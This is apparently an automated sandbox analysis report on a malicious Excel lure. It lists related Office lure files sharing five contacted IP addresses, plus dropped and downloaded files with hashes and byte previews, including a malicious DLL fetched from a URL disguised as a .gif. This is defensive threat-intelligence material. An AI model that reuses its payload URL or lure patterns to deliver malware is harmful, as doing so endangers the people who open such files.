                                                                        FARASIS.xlsxGet hashmaliciousBrowse
                                                                        • 207.174.213.126
                                                                        • 198.50.218.68
                                                                        • 162.241.62.4
                                                                        • 5.100.155.169
                                                                        • 192.185.129.4
                                                                        NEW LEMA PO 652872-21.pptGet hashmaliciousBrowse
                                                                        • 207.174.213.126
                                                                        • 198.50.218.68
                                                                        • 162.241.62.4
                                                                        • 5.100.155.169
                                                                        • 192.185.129.4
                                                                        document-1055791644.xlsGet hashmaliciousBrowse
                                                                        • 207.174.213.126
                                                                        • 198.50.218.68
                                                                        • 162.241.62.4
                                                                        • 5.100.155.169
                                                                        • 192.185.129.4
                                                                        final po PP-11164.pptGet hashmaliciousBrowse
                                                                        • 207.174.213.126
                                                                        • 198.50.218.68
                                                                        • 162.241.62.4
                                                                        • 5.100.155.169
                                                                        • 192.185.129.4
                                                                        OrderSheet.ppsGet hashmaliciousBrowse
                                                                        • 207.174.213.126
                                                                        • 198.50.218.68
                                                                        • 162.241.62.4
                                                                        • 5.100.155.169
                                                                        • 192.185.129.4
                                                                        document-1848152474.xlsmGet hashmaliciousBrowse
                                                                        • 207.174.213.126
                                                                        • 198.50.218.68
                                                                        • 162.241.62.4
                                                                        • 5.100.155.169
                                                                        • 192.185.129.4
                                                                        appraisal document.docGet hashmaliciousBrowse
                                                                        • 207.174.213.126
                                                                        • 198.50.218.68
                                                                        • 162.241.62.4
                                                                        • 5.100.155.169
                                                                        • 192.185.129.4
                                                                        document-1048628209.xlsGet hashmaliciousBrowse
                                                                        • 207.174.213.126
                                                                        • 198.50.218.68
                                                                        • 162.241.62.4
                                                                        • 5.100.155.169
                                                                        • 192.185.129.4
                                                                        document-1771131239.xlsGet hashmaliciousBrowse
                                                                        • 207.174.213.126
                                                                        • 198.50.218.68
                                                                        • 162.241.62.4
                                                                        • 5.100.155.169
                                                                        • 192.185.129.4
                                                                        document-1370071295.xlsGet hashmaliciousBrowse
                                                                        • 207.174.213.126
                                                                        • 198.50.218.68
                                                                        • 162.241.62.4
                                                                        • 5.100.155.169
                                                                        • 192.185.129.4
                                                                        document-69564892.xlsGet hashmaliciousBrowse
                                                                        • 207.174.213.126
                                                                        • 198.50.218.68
                                                                        • 162.241.62.4
                                                                        • 5.100.155.169
                                                                        • 192.185.129.4
                                                                        document-1320073816.xlsGet hashmaliciousBrowse
                                                                        • 207.174.213.126
                                                                        • 198.50.218.68
                                                                        • 162.241.62.4
                                                                        • 5.100.155.169
                                                                        • 192.185.129.4
                                                                        document-184653858.xlsGet hashmaliciousBrowse
                                                                        • 207.174.213.126
                                                                        • 198.50.218.68
                                                                        • 162.241.62.4
                                                                        • 5.100.155.169
                                                                        • 192.185.129.4
                                                                        document-1729033050.xlsGet hashmaliciousBrowse
                                                                        • 207.174.213.126
                                                                        • 198.50.218.68
                                                                        • 162.241.62.4
                                                                        • 5.100.155.169
                                                                        • 192.185.129.4
                                                                        document-1268722929.xlsGet hashmaliciousBrowse
                                                                        • 207.174.213.126
                                                                        • 198.50.218.68
                                                                        • 162.241.62.4
                                                                        • 5.100.155.169
                                                                        • 192.185.129.4
                                                                        document-540475316.xlsGet hashmaliciousBrowse
                                                                        • 207.174.213.126
                                                                        • 198.50.218.68
                                                                        • 162.241.62.4
                                                                        • 5.100.155.169
                                                                        • 192.185.129.4

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                                        Category:dropped
                                                                        Size (bytes):58596
                                                                        Entropy (8bit):7.995478615012125
                                                                        Encrypted:true
                                                                        SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                                        MD5:61A03D15CF62612F50B74867090DBE79
                                                                        SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                                        SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                                        SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):893
                                                                        Entropy (8bit):7.366016576663508
                                                                        Encrypted:false
                                                                        SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                                                        MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                                                        SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                                                        SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                                                        SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):326
                                                                        Entropy (8bit):3.1146655678160093
                                                                        Encrypted:false
                                                                        SSDEEP:6:kKOO3PkwTJ0N+SkQlPlEGYRMY9z+4KlDA3RUe0ht:J3PkwTJrkPlE99SNxAhUe0ht
                                                                        MD5:933FF45DA6B4A343AEEC08A091A0BAEE
                                                                        SHA1:41E1BB9E9E742EB28DBE56E40BCA6F81B1E26CF1
                                                                        SHA-256:18AAC2CBE90A2C0EB724E76527F9DD392C5F90C601D2945AE5BD38E3D7EC3B17
                                                                        SHA-512:10968A1112C238A32E24B756CD383825BEC08D823605767334380EC7266863597460FE7455628C7200C34F324F8C21E53F58CEDC75FAAEF2DF8710742DE60719
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview: p...... ..........8.+..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...
                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):252
                                                                        Entropy (8bit):3.01359045659566
                                                                        Encrypted:false
                                                                        SSDEEP:3:kkFkle73/tfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kKFjnliBAIdQZV7eAYLit
                                                                        MD5:4B29AE3F4B4A3D5A3E8F2369603F007B
                                                                        SHA1:9408647A0936E4ED1D803963436369E2FFEA7AA1
                                                                        SHA-256:1A35BA761920227FB7A7FCB72F10AB5A5598EA5AAA26ED01CFAA0B2A568B6877
                                                                        SHA-512:397BE9E0ACFBDDD9A2630677F8172A3BFFF600C42BA8C852395188531318798E94DB66F00565B3AF92F54D3332F2758AE3D077D690738BE64B237C243881FC53
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview: p...... ....`...]..9.+..(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\suspendedpage[1].htm
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:HTML document, ASCII text, with very long lines
                                                                        Category:downloaded
                                                                        Size (bytes):7614
                                                                        Entropy (8bit):5.643196429180972
                                                                        Encrypted:false
                                                                        SSDEEP:192:olVZHCkA26xd3Q4JRveuTtMy47R/Ga0kVhFuPwf8Pn9wHHyJcf:QJvVGaRF8I80
                                                                        MD5:116091ED739B7E0F1AD7F819560A0602
                                                                        SHA1:C30A527A2A5F25BC1A63359CAD76A8BAB67CB4FB
                                                                        SHA-256:0445F0A98A263C472AE1C8D8E28275AFEA1BDDD7692746AA5286097B311B29B1
                                                                        SHA-512:83F16BCA5EA4062470B8807912F10B6D743C2DEF2261B4E16098EA8FC1DCB6692CBBD4C6870F27408422B75A3CDCD46A3856AB2162177ED2386D4B8188C122E8
                                                                        Malicious:false
                                                                        Reputation:moderate, very likely benign file
                                                                        IE Cache URL:https://vts.us.com/cgi-sys/suspendedpage.cgi
                                                                        Preview: <!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;.
                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\suspendedpage[1].htm
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:HTML document, ASCII text, with very long lines
                                                                        Category:downloaded
                                                                        Size (bytes):7624
                                                                        Entropy (8bit):5.642596381720329
                                                                        Encrypted:false
                                                                        SSDEEP:192:olVZHCkA26xd3Q4JRveuTtMy47R/Ga0kVhFuPwf8Pn9wHHyJf0:QJvVGaRF8I80
                                                                        MD5:190F2D4BCDE1E366EAAB903C29C7A699
                                                                        SHA1:346D44A0619C97AA226EF52F146F9A133F4DCAAF
                                                                        SHA-256:20C2D643754869BA5763DDC6289A0FADBBF2DE81236F1F80B7FA3588B14F6EBB
                                                                        SHA-512:AB3C39F0B6A07F798E9546FA882BE0D850F88337DFBFBF7A797A67B43CC1EA8718C842619E4FE169FD3A6FE270C39866F6B4DBB0187612B2840A6474D0E26BB6
                                                                        Malicious:false
                                                                        IE Cache URL:https://ponchokhana.com/cgi-sys/suspendedpage.cgi
                                                                        Preview: <!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;.
                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0104[1].gif
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:downloaded
                                                                        Size (bytes):129731
                                                                        Entropy (8bit):5.747848755116591
                                                                        Encrypted:false
                                                                        SSDEEP:1536:tm15JsYYm3GCVS7ZicTJzRVd620ZmB9RMli0msUdqZEACW4jySTLW:eLsacThRVd6pmBPM07vYZEA4/W
                                                                        MD5:9BDF7C3BDB07C77AB4AE0BECC716B6D0
                                                                        SHA1:C5B2ED793BCFE4D96B2CE93B202B2F551AFB8C87
                                                                        SHA-256:4106E859C225B6FED690E1640CC98E4808E1FF7C5CB041C18493996B04805E48
                                                                        SHA-512:117EFAABE33020EE1C14924D1FB19FE57F2DE6E3FEAB007F3B9A117931479585188500D0B50854CD7D2D85003D00AB313BB662D02571BC4C834FAA25E6360216
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        IE Cache URL:https://accesslinksgroup.com/ds/0104.gif
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._W...6e..6e..6e.)v..6e...w..6e.Rich.6e.................PE..L.....f`...........!................ko..................................................................................d............................................................................................................................code.............................. ..`.data...d...........................@..@.data...............................@....rdata... .......".......................data...............................@...................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Temp\1DCE0000
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):86267
                                                                        Entropy (8bit):7.89687724118678
                                                                        Encrypted:false
                                                                        SSDEEP:1536:BFlnA+3D5XUYz/wBf8orsEwHKynWLmArf7WtfHR1ijrvWf46rtvpnny:BLA+tDzPjEwqtD3Wt51ijKA6rtvpny
                                                                        MD5:59485B13A6C7B5873A40FB2EC45BD39F
                                                                        SHA1:941883BDB59D930E7E3986D058B233C34630A6BF
                                                                        SHA-256:B643678F376F596E7EDA854BF5254525B7049E08D940411366E70F0DC7EE8550
                                                                        SHA-512:964A5FD3D815AAAA9A275EB5F8779EF6A82FD4E0B507C9DBFB392CC1861A2E23FE1CFB7ADE97AF17A98B21E1096D970506DE131612E8043CDE796AB37CD01F13
                                                                        Malicious:false
                                                                        Preview: ...n.0.E.......D'...,g...&@....c.0_ .....eEm...t....4._m...1D.l...+..'.mj.......J..b.........c,....).K.h.@..GK++..$....A..A~>.]p.lB..5.b..W.Sq...;'KeYq../.j..k% .Q.l...t...(.x2$]E..dl........S.."....6{Le..|.pE@..JFl.9TT..[..7...B^y;...60(.........7....^:.....0M,q#PW]b......FZ.e_..!u..w_g...>$../w.....|.Fh..d3C....{p..z..nH.Oy......-G.}~|.;...c.j..r=........>..h>....#>d..l..?>.{/4....uK.....t..i....#...O7.:jsu.I.CR8..C.l ..?..w.a>.$..l...........PK..........!....M....~.......[Content_Types].xml ...(.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Temp\CabD53B.tmp
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                                        Category:dropped
                                                                        Size (bytes):58596
                                                                        Entropy (8bit):7.995478615012125
                                                                        Encrypted:true
                                                                        SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                                        MD5:61A03D15CF62612F50B74867090DBE79
                                                                        SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                                        SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                                        SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                                        Malicious:false
                                                                        Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                                        C:\Users\user\AppData\Local\Temp\TarD53C.tmp
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):152788
                                                                        Entropy (8bit):6.309740459389463
                                                                        Encrypted:false
                                                                        SSDEEP:1536:TIz6c7xcjgCyrYBZ5pimp4Ydm6Caku2Dnsz0JD8reJgMnl3rlMGGv:TNqccCymfdmoku2DMykMnNGG0
                                                                        MD5:4E0487E929ADBBA279FD752E7FB9A5C4
                                                                        SHA1:2497E03F42D2CBB4F4989E87E541B5BB27643536
                                                                        SHA-256:AE781E4F9625949F7B8A9445B8901958ADECE7E3B95AF344E2FCB24FE989EEB7
                                                                        SHA-512:787CBC262570A4FA23FD9C2BA6DA7B0D17609C67C3FD568246F9BEF2A138FA4EBCE2D76D7FD06C3C342B11D6D9BCD875D88C3DC450AE41441B6085B2E5D48C5A
                                                                        Malicious:false
                                                                        Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........|h....210303062855Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Apr 7 16:55:37 2021, atime=Wed Apr 7 16:55:37 2021, length=8192, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):867
                                                                        Entropy (8bit):4.480171247399955
                                                                        Encrypted:false
                                                                        SSDEEP:12:85Q0XNcLgXg/XAlCPCHaXtB8XzB/oPUsxX+WnicvbVbDtZ3YilMMEpxRljKVTdJU:853NK/XTd6jytYeFDv3q8rNru/
                                                                        MD5:ADAA11F5477E217D89FE1276B7B4DF31
                                                                        SHA1:73C4A6FF57F2AEF1A2829D6C9C5D7B18F1029386
                                                                        SHA-256:F16FD70438671887819B69CC1339ECCA391B78744FB4AA530888C6521912F2B2
                                                                        SHA-512:5A01857EF32BA4DFBDCA84600867709F9287D5C00E9306D62B60A87F3A3A9F8D73E3AE26C7A9112B7693EADDB10B0EECCE18367B8435BE319FA5860AEEE5504F
                                                                        Malicious:false
                                                                        Preview: L..................F...........7G..u..7.+..u..7.+... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R...Desktop.d......QK.X.R.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\910646\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......910646..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-1245492889.LNK
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Apr 7 16:55:37 2021, atime=Wed Apr 7 16:55:38 2021, length=185344, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):2118
                                                                        Entropy (8bit):4.535357653734618
                                                                        Encrypted:false
                                                                        SSDEEP:48:8/3/XT0jFa4tRitU8Qh2/3/XT0jFa4tRitU8Q/:8//XojFaSGU8Qh2//XojFaSGU8Q/
                                                                        MD5:47C7590884F78400BB263A71C493D9D8
                                                                        SHA1:90C93F3C61B70B65CB0502E2EF3B996649B16E07
                                                                        SHA-256:EAFAC668BB1A633FE299BDFF5859A9BD5FA5CD0DDEC45C188824EA9A0D77717B
                                                                        SHA-512:BF5BA6DA53AA997F42F801F20A61C3CF069E4C33596353F7E0F650E11C6F3E05DE6901E74EEA53461661F1BE7CAEEB3D4C0737A0697419B6DDB3DC73E2C27890
                                                                        Malicious:false
                                                                        Preview: L..................F.... ...lV...{..u..7.+.....7.+...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2......R.. .DOCUME~1.XLS..\.......Q.y.Q.y*...8.....................d.o.c.u.m.e.n.t.-.1.2.4.5.4.9.2.8.8.9...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\910646\Users.user\Desktop\document-1245492889.xls.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.1.2.4.5.4.9.2.8.8.9...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......910646..........D_....3N.
                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):110
                                                                        Entropy (8bit):4.81906300856618
                                                                        Encrypted:false
                                                                        SSDEEP:3:oyBVomMY9LRMcXf6p5oZELRMcXf6p5omMY9LRMcXf6p5ov:dj6Y9L8SEL86Y9L8y
                                                                        MD5:D2AF0D62D75E6CE864E75765FCF0AA3D
                                                                        SHA1:32AAE53E47D7E027E1240B2C39129F6001D4FAD5
                                                                        SHA-256:8CFA902A46D50CCDBD04EC7C62CCF4D2F5BC05297ADCD89241209C044920FEFA
                                                                        SHA-512:EE8FBA4DE54B84EBDD12ED4ED39A14B9B34BD2BB4C947E6C16E0659DEA7ACDC07BD2E2A252A26A2B994EAD7A8613A71BF584D4DDFD024D3DCF45F4498FBD1D4F
                                                                        Malicious:false
                                                                        Preview: Desktop.LNK=0..[xls]..document-1245492889.LNK=0..document-1245492889.LNK=0..[xls]..document-1245492889.LNK=0..
                                                                        C:\Users\user\Desktop\EDCE0000
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:Applesoft BASIC program data, first line number 16
                                                                        Category:dropped
                                                                        Size (bytes):234340
                                                                        Entropy (8bit):5.681180533619061
                                                                        Encrypted:false
                                                                        SSDEEP:3072:CbmxIEudkLee/DPPjwwm+D17+DXPbmxIEudkLeG:/IEudkLee7nvD1qDXIIEudkLeG
                                                                        MD5:EA7F4AD655E501AC7BBCDB3967275D9E
                                                                        SHA1:81829B1A969FB1FCDF97AB3D8DADA9865EB899F3
                                                                        SHA-256:9723784C3A4FD7DDFA5EEE186EFE907C995310121C7BD0CC536F1270970CE824
                                                                        SHA-512:21078C0A632CC732927BE0F2FDD3B3769F23108987C9DBA42B6F45725FB16E0EFBDCCB6F94029964C5AEB7E7E8FE299CAB14B8A7F0F0C8DC24E031C111A26C7A
                                                                        Malicious:false
                                                                        Preview: ........g2..........................\.p.... B.....a.........=...............................................=.....i..9!.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1.......4...........A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...,...8...........A.r.i.a.l.1.......8...........A.r.i.a.l.1.......8...........A.r.i.a.l.1...................C.a.l.i.b.r.i.1.......>...........A.r.i.a.l.1.......4...........A.r.i.a.l.1.......<...........A.r.i.a.l.1.......?...........A.r.i.a.l.1...h...8...........C.a.m.b.r.i.a.1...................A.r.i.a.l.1...............
                                                                        C:\Users\user\fikftkm.thj
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:HTML document, ASCII text, with very long lines
                                                                        Category:dropped
                                                                        Size (bytes):7614
                                                                        Entropy (8bit):5.643196429180972
                                                                        Encrypted:false
                                                                        SSDEEP:192:olVZHCkA26xd3Q4JRveuTtMy47R/Ga0kVhFuPwf8Pn9wHHyJcf:QJvVGaRF8I80
                                                                        MD5:116091ED739B7E0F1AD7F819560A0602
                                                                        SHA1:C30A527A2A5F25BC1A63359CAD76A8BAB67CB4FB
                                                                        SHA-256:0445F0A98A263C472AE1C8D8E28275AFEA1BDDD7692746AA5286097B311B29B1
